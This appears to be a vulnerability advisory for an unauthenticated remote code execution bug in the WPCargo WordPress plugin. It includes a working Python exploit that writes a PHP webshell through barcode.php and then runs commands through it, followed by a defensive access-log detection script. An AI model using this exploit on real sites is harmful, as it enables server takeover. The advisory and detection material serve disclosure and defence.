wpexploit - Krzysztof Zając - WPEX-ID:5C21AD35-B2FB-4A51-858F-8FFFF685DE4A
History: Feb 21, 2022 - 12:00 a.m.

WPCargo < 6.9.0 - Unauthenticated RCE


EPSS: 0.612 (Medium) | Percentile: 97.8%

The plugin ships a file (includes/barcode.php) that lets unauthenticated attackers write a PHP file to an arbitrary path on the web server, leading to remote code execution.

import binascii
import requests

# This is a magic string that when treated as pixels and compressed using the png
# algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'

def encode_character_code(c: int):
    # Render one byte as its 8-bit string, keeping '1' as-is and replacing '0' with 'x'
    return '{:08b}'.format(c).replace('0', 'x')

# Concatenate the bit strings of every payload byte and drop the leading bit
text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

destination_url = 'http://127.0.0.1:8001/'
cmd = 'ls'

# With 1/11 scale, '1's will be encoded as single white pixels, 'x's as single black pixels.
# The filepath parameter controls where barcode.php writes the generated image.
requests.get(
    f"{destination_url}wp-content/plugins/wpcargo/includes/barcode.php?text={text}&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php"
)

# We have uploaded a webshell - now let's use it to execute a command.
print(requests.post(
    f"{destination_url}webshell.php?1=system", data={"2": cmd}
).content.decode('ascii', 'ignore'))
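Detection logic for the request pattern this advisory describes, added here as an example; it is not part of the original advisory or of the plugin's code. It parses Apache combined-format access-log lines (the sample lines below are constructed, not real traffic), flags any request to barcode.php that carries a filepath parameter, and then correlates a later request from the same source to the file that parameter named. The rule names, severity scheme and sample addresses are assumptions.

```python
import os
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path named in the advisory's request
BARCODE_PATH = "/wp-content/plugins/wpcargo/includes/barcode.php"

# Apache combined-format prefix: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (hypothetical addresses, not real traffic)
SAMPLE_LOG = """\
203.0.113.5 - - [21/Feb/2022:10:15:01 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=1x1x&sizefactor=.090909090909&size=1&filepath=/var/www/html/webshell.php HTTP/1.1" 200 512 "-" "python-requests/2.27"
203.0.113.5 - - [21/Feb/2022:10:15:02 +0000] "POST /webshell.php?1=system HTTP/1.1" 200 88 "-" "python-requests/2.27"
198.51.100.7 - - [21/Feb/2022:10:16:00 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=ORDER42&filepath=barcodes/order.png HTTP/1.1" 200 1040 "-" "Mozilla/5.0"
198.51.100.8 - - [21/Feb/2022:10:16:30 +0000] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=ABC123&size=2 HTTP/1.1" 200 1040 "-" "Mozilla/5.0"
198.51.100.9 - - [21/Feb/2022:10:17:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"
"""


def scan(log_text):
    """Return a list of findings for the access-log text, in log order."""
    findings = []
    dropped = {}  # client ip -> basenames it asked barcode.php to write
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        ip = m["ip"]
        parts = urlsplit(m["target"])
        path = unquote(parts.path)
        qs = parse_qs(parts.query, keep_blank_values=True)  # values are already URL-decoded
        if path.endswith(BARCODE_PATH) and "filepath" in qs:
            fp = qs["filepath"][0]
            # An absolute path or a .php target is the advisory's write-anywhere case;
            # a relative non-PHP path is still worth a look, but is less clear-cut.
            severity = "high" if os.path.isabs(fp) or fp.lower().endswith(".php") else "medium"
            findings.append({"ip": ip, "ts": m["ts"], "rule": "wpcargo-barcode-filepath",
                             "severity": severity, "filepath": fp})
            dropped.setdefault(ip, set()).add(os.path.basename(fp))
        elif ip in dropped and os.path.basename(path) in dropped[ip]:
            # Same client later touches the file it asked barcode.php to write
            findings.append({"ip": ip, "ts": m["ts"], "rule": "wpcargo-dropped-file-access",
                             "severity": "high", "path": path, "method": m["method"]})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The first rule fires on the write itself and is the one to alert on; the second only confirms follow-on use, since a plugin that needs filepath for legitimate reasons will still trigger the first rule at medium severity.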
